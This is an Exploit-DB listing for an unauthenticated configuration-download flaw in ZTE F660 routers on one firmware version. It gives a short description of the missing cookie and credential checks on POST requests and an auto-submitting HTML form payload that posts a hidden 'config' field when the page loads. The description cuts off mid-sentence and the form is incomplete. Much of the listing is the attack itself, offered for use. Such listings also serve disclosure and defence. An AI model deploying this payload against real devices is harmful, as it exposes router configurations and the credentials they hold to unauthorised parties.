ZTE F660 - Remote Config Download

ID EDB-ID:36978
Type exploitdb
Reporter Daniel Cisa
Modified 2015-05-11T00:00:00


ZTE F660 - Remote Config Download. Webapps exploit for hardware platform

Exploit Title   : ZTE remote configuration download
Date            : 09 May 2015
Exploit Author  : Daniel Cisa
Vendor Homepage : http://wwwen.zte.com.cn/en/
Platform        : Hardware
Tested On       : ZTE F660
Firmware Version: 2.22.21P1T8S
 Config remote download
ZTE F660 Embedded Software does not check Cookies And Credentials on POST
method so
attackers could download the config file with this post method without

<body onload="document.fDownload.submit();">
<form name="fDownload" method="POST" action=""
enctype="multipart/form-data" onsubmit="return false;">
Request Sent....
<input type="hidden" name="config" id="config" value="">